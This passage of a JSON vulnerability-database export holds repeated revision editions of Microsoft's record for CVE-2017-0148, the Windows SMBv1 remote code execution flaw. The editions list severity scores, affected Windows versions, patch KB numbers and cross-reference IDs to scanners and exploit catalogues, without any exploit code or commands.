Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-28T22:45:57", "differentElements": ["msAffectedSoftware"], "edition": 79}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-29T08:51:23", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-28T08:53:53", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-28T08:53:53", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013198", "KB3212646", "KB4012216", "KB4012214", "KB4012213", "KB3205401", "KB3177186", "KB4012212", 
"KB3210720", "KB3210721", "KB4012217", "KB3205409", "KB4012215", "KB4012606", "KBMS16-110, 3187754", "KB4012598", "KB3213986", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-29T08:51:23", "differentElements": ["msAffectedSoftware"], "edition": 80}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-29T10:45:17", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-28T08:53:53", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-28T08:53:53", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012606", "KB3210720", "KB3212646", "KB4012215", "KB4012216", "KBMS16-110, 3187754", "KB4012214", "KB3210721", "KB4012217", "KB4013198", "KB3177186", "KB4012212", "KB3205409", "KB4012598", "KB3205401", "KB3213986", "KB4012213", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-29T10:45:17", "differentElements": ["msAffectedSoftware"], "edition": 81}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-30T06:48:04", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": 